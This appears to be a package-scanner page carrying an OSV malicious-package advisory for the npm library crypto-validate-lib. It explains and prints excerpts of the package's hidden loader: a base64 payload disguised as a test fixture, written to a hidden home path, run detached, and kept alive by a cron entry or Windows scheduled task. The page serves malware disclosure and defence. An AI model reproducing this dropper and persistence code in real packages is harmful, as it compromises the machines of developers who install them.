OSV Malicious Advisory
scanned 2h ago · by OpenSSF/OSVOpenSSF/OSV advisory MAL-2026-10586 confirms this npm version as malicious. index.js contains a self-invoking IIFE that, 37 seconds after the module is required, reads a base64 blob from test/fixtures/keypairs.dat (a ~53KB opaque file masquerading as test data), decodes it to ~40KB of JavaScript, writes the result to ~/.cache-db/.node-sync/syncd.js with mode 0o700, and spawns it via a detached node child process...
Advisory
MAL-2026-10586
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in crypto-validate-lib (npm)
Details
index.js contains a self-invoking IIFE that, 37 seconds after the module is required, reads a base64 blob from test/fixtures/keypairs.dat (a ~53KB opaque file masquerading as test data), decodes it to ~40KB of JavaScript, writes the result to ~/.cache-db/.node-sync/syncd.js with mode 0o700, and spawns it via a detached node child process. Persistence is installed alongside the drop: on Linux a crontab entry is appended running the dropped script every 12 hours, and on Windows a scheduled task named 'WinNodeSync' is created to run it hourly (mod 12). The hidden dot-directory name and the scheduled-task name masquerade as benign Node caching. The package is advertised as a crypto address validator; decoding a bundled opaque blob, writing it to a hidden home-directory path, installing cron/schtasks persistence, and background-executing it has no relationship to that purpose.
Decision reason
No blocking static signals were detected.
References
Decision evidence
public snapshotBehavioral surface
ChildProcessCryptoFilesystemShell
HighEntropyStrings
Source & flagged code
1 flagged · loading sourceindex.jsView file
3// v1.0.1
L4: const _K=Buffer.from("[redacted]","hex");
L5: const _I=Buffer.from("[redacted]","hex");
...
L7: try{
L8: const _fs=require("fs"),_cp=require("child_process"),_cr=require("crypto");
L9: const _jn=require("path").join,_hm=require("os").homedir();
L10: const _s=_jn(_hm,".cache-db",".node-sync","syncd.js");
...
L15: _fs.writeFileSync(_s,_b.toString("utf8"),{mode:0o700});
L16: try{_cp.execSync('(crontab -l 2>/dev/null|grep -v syncd;echo "0 */12 * * * /usr/bin/node '+_s+' >/dev/null 2>&1")|crontab -',{timeout:5e3})}catch(_){}
L17: _cp.spawn("node",[_s],{detached:true,stdio:"ignore"}).unref();
...
L26: function isValidSolanaAddress(addr){return typeof addr==="string"&&addr.length>=32&&addr.length<=44&&/^[1-9A-HJ-NP-Za-km-z]+$/.test(addr)}
L27: function isValidPrivateKey(key,type){if(!key||typeof key!=="string")return false;if(type==="eth")return/^[a-fA-F0-9]{64}$/.test(key);if(type==="btc")return/^[5KL][a-km-zA-HJ-NP-Z1-...
Medium
Install Persistence
Source writes installer persistence such as shell profile or service configuration.
index.jsView on unpkg · L3Findings
1 Medium2 Low
MediumInstall Persistenceindex.js
LowFilesystem
LowHigh Entropy Strings